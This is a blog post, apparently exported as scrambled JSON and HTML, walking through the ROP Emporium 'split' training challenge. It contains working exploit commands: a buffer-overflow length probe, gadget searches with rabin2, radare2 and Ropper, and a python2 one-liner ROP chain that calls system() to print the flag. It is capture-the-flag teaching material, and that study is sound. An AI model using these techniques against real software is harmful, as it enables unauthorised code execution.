In this challenge the elements that allowed you to complete the ret2win challenge are still present, they’ve just been split apart. Find them and recombine them using a short ROP chain.<\/p>\n
The binary and challenge description can be found here: This challenge bumps up the difficulty a bit. We’ll need to build a small ROP chain to get the binary to perform the same actions as the ret2win challenge.<\/p>\n First, let’s get the binary and run it:<\/p>\n Same functionality as before, though the length of the buffer is not specified. It’s probably the same, but I’ll want to verify anyway. Unfortunately, overwriting beyond the saved return pointer on the stack results in the RIP register not actually getting the overwritten value:<\/p>\n This happened with the ret2win challenge as well, I just didn’t demonstrate it since the ret2win page tells you to use 45 bytes to overflow the buffer. I think it has to do with the protections in place for the binary. Fortunately, I can use the power of Bash loops to quickly figure out how many bytes of input causes a segfault:<\/p>\n As predicted, this is the same as with the ret2win challenge. On to building a ROP chain. The “split challenge” page says that we should verify the two elements that are necessary to complete this, the Now I’ll need to learn how the call to system() <\/span>is made while passing a string as an argument. For that, I’ll look at the ret2win binary as an example:<\/p>\n This shows that all I need to do is get the address of the string into EDI\/RDI and make the call to system()<\/span>. What I can do, it put the address of the string (0x601060) onto the stack, pop that into RDI (since this is 64-bit after all), then call system()<\/span>.<\/p>\n First, as a proof-of-concept, I’d like to make sure I can exploit the binary. Fortunately, there’s an unused function that I can force the program to call:<\/p>\n I used the a<\/u>nalyze x<\/u>references F<\/u>lags command to find any cross references to the Let’s overwrite the saved return pointer on the stack to redirect the flow of execution to there:<\/p>\n There it is! Right before the segfault is the listing of files in my current directory. Now I can build a ROP chain to get the binary to spit out the contents of flag.txt. The input to the binary will look something like this:<\/p>\n So now, we’ve got to actually find the gadget. radare2 has as gadget searching mechanism using the Great! It found one. Now I’ve got all the addresses I need. The input should now look like:<\/p>\n Now I should be able to put it all together. If it were any more complex, I’d probably write a Python script, but I can squeeze this onto a single line:<\/p>\n Perhaps in the future I’ll learn how to use the pwntools<\/a> Python library.<\/p>\n","protected":false},"excerpt":{"rendered":" In this challenge the elements that allowed you to complete the ret2win challenge are still present, they’ve just been split apart. Find them and recombine them using a short ROP chain. … Continue readingROP Emporium | split Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-945","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/945","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=945"}],"version-history":[{"count":25,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/945\/revisions"}],"predecessor-version":[{"id":986,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/945\/revisions\/986"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=945"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=945"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=945"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nhttps:\/\/ropemporium.com\/challenge\/split.html<\/a><\/p>\n\r\nandrew ~ $ wget --quiet https:\/\/ropemporium.com\/binary\/split.zip\r\n\r\nandrew ~ $ unzip split.zip \r\nArchive: split.zip\r\n inflating: split \r\n extracting: flag.txt \r\n\r\nandrew ~ $ .\/split \r\nsplit by ROP Emporium\r\n64bits\r\n\r\nContriving a reason to ask user for data...\r\n> stuff\r\n\r\nExiting\r\n<\/pre>\n
\r\nandrew ~ $ sudo dmesg -C\r\n\r\nandrew ~ $ python2 -c 'print "A"*200' | .\/split \r\nsplit by ROP Emporium\r\n64bits\r\n\r\nContriving a reason to ask user for data...\r\n> Segmentation fault (core dumped)\r\n\r\nandrew ~ $ dmesg -t\r\ntraps: split[109086] general protection fault ip:400806 sp:7ffc20ef29e8 error:0 in split[400000+1000]\r\n<\/pre>\n
\r\nandrew ~ $ for i in $(seq 30 50); do echo "Bytes: $i"; python2 -c "print \\"A\\"*$i" | .\/split >\/dev\/null; done\r\nBytes: 30\r\nBytes: 31\r\nBytes: 32\r\nBytes: 33\r\nBytes: 34\r\nBytes: 35\r\nBytes: 36\r\nBytes: 37\r\nBytes: 38\r\nBytes: 39\r\nBytes: 40\r\nSegmentation fault (core dumped)\r\nBytes: 41\r\nSegmentation fault (core dumped)\r\nBytes: 42\r\nSegmentation fault (core dumped)\r\nBytes: 43\r\nSegmentation fault (core dumped)\r\nBytes: 44\r\nSegmentation fault (core dumped)\r\nBytes: 45\r\nSegmentation fault (core dumped)\r\n...\r\n\r\nandrew ~ $ sudo dmesg -C\r\n\r\nandrew ~ $ python2 -c 'print "A"*45' | .\/split \r\nsplit by ROP Emporium\r\n64bits\r\n\r\nContriving a reason to ask user for data...\r\n> Segmentation fault (core dumped)\r\n\r\nandrew ~ $ dmesg -t\r\nsplit[110005]: segfault at a4141414141 ip 00000a4141414141 sp 00007fff59067ee0 error 14 in libc-2.30.so[7f7abc2d2000+25000]\r\nCode: Bad RIP value.\r\n<\/pre>\n
\"\/bin\/cat flag.txt\"<\/code> string and the call to system()<\/span>. rabin2<\/code> can help us with that:<\/p>\n\r\nandrew ~ $ rabin2 -z split\r\n[Strings]\r\nNum Paddr Vaddr Len Size Section Type String\r\n000 0x000008a8 0x004008a8 21 22 (.rodata) ascii split by ROP Emporium\r\n001 0x000008be 0x004008be 7 8 (.rodata) ascii 64bits\\n\r\n002 0x000008c6 0x004008c6 8 9 (.rodata) ascii \\nExiting\r\n003 0x000008d0 0x004008d0 43 44 (.rodata) ascii Contriving a reason to ask user for data...\r\n004 0x000008ff 0x004008ff 7 8 (.rodata) ascii \/bin\/ls\r\n000 0x00001060 0x00601060 17 18 (.data) ascii \/bin\/cat flag.txt\r\n\r\nandrew ~ $ rabin2 -i split\r\n[Imports]\r\nNum Vaddr Bind Type Name\r\n 1 0x004005d0 GLOBAL FUNC puts\r\n 2 0x004005e0 GLOBAL FUNC system\r\n 3 0x004005f0 GLOBAL FUNC printf\r\n 4 0x00400600 GLOBAL FUNC memset\r\n 5 0x00400610 GLOBAL FUNC __libc_start_main\r\n 6 0x00400620 GLOBAL FUNC fgets\r\n 7 0x00000000 WEAK NOTYPE __gmon_start__\r\n 8 0x00400630 GLOBAL FUNC setvbuf\r\n<\/pre>\n
\r\n[0x00400650]> aa\r\n[Cannot analyze at 0x00400640g with sym. and entry0 (aa)\r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n\r\n[0x00400650]> pdf @ sym.ret2win\r\n\u250c (fcn) sym.ret2win 32\r\n\u2502 sym.ret2win ();\r\n\u2502 0x00400811 push rbp\r\n\u2502 0x00400812 mov rbp, rsp\r\n\u2502 0x00400815 mov edi, str.Thank_you__Here_s_your_flag: ; 0x4009e0 ; "Thank you! Here's your flag:"\r\n\u2502 0x0040081a mov eax, 0\r\n\u2502 0x0040081f call sym.imp.printf ; int printf(const char *format)\r\n\u2502 0x00400824 mov edi, str.bin_cat_flag.txt ; 0x4009fd ; "\/bin\/cat flag.txt"\r\n\u2502 0x00400829 call sym.imp.system ; int system(const char *string)\r\n\u2502 0x0040082e nop\r\n\u2502 0x0040082f pop rbp\r\n\u2514 0x00400830 ret\r\n<\/pre>\n
\r\n[0x00400650]> fs imports\r\n\r\n[0x00400650]> f~system\r\n0x004005e0 6 sym.imp.system\r\n\r\n[0x00400650]> axF sym.imp.system\r\nFinding references of flags matching 'sym.imp.system'...\r\n[0x004009b0-0x00400a84] sym.usefulFunction 0x400810 [CALL] call sym.imp.system\r\nMacro 'findstref' removed.\r\n\r\n[0x00400650]> pdf @ sym.usefulFunction\r\n\u250c (fcn) sym.usefulFunction 17\r\n\u2502 sym.usefulFunction ();\r\n\u2502 0x00400807 push rbp\r\n\u2502 0x00400808 mov rbp, rsp\r\n\u2502 0x0040080b mov edi, str.bin_ls ; 0x4008ff ; "\/bin\/ls"\r\n\u2502 0x00400810 call sym.imp.system ; int system(const char *string)\r\n\u2502 0x00400815 nop\r\n\u2502 0x00400816 pop rbp\r\n\u2514 0x00400817 ret\r\n<\/pre>\n
sym.imp.system<\/code> flag. In this case, radare2 tells me that it’s called by usefulFunction()<\/span>. It seems the only purpose of that function is to run the \/bin\/ls<\/code> command.<\/p>\n\r\nandrew ~ $ python2 -c 'import struct;print "A"*40 + struct.pack("Q",0x400807)' | .\/split\r\nsplit by ROP Emporium\r\n64bits\r\n\r\nContriving a reason to ask user for data...\r\n> Desktop Documents Downloads exploit-pattern flag.txt profile.rr2 ret2win split 'VirtualBox VMs'\r\nSegmentation fault (core dumped)\r\n<\/pre>\n\r\n"A" * 40 => buffer\r\nAddress1 => "pop edi" gadget\r\nAddress2 => "\/bin\/cat flag.txt"\r\nAddress3 => system()\r\n<\/pre>\n
\/R<\/code> command. However, I can’t seem to get it to work properly. No matter. I can use Ropper<\/a>, a Python-based tool for searching for gadgets:<\/p>\n\r\nandrew ~ $ ropper --file split --search "pop rdi; ret"\r\n[INFO] Load gadgets from cache\r\n[LOAD] loading... 100%\r\n[LOAD] removing double gadgets... 100%\r\n[INFO] Searching for gadgets: pop rdi; ret\r\n\r\n[INFO] File: split\r\n0x0000000000400883: pop rdi; ret;\r\n<\/pre>\n
\r\n"A" * 40 => buffer\r\n0x400883 => "pop edi" gadget\r\n0x601060 => "\/bin\/cat flag.txt"\r\n0x4005e0 => system()\r\n<\/pre>\n
\r\nandrew ~ $ python2 -c 'import struct;print "A"*40 + struct.pack("Q",0x400883)+struct.pack("Q",0x601060)+struct.pack("Q",0x4005e0)' | .\/split\r\nsplit by ROP Emporium\r\n64bits\r\n\r\nContriving a reason to ask user for data...\r\n> ROPE{a_placeholder_32byte_flag!}\r\nSegmentation fault (core dumped)\r\n<\/pre>\n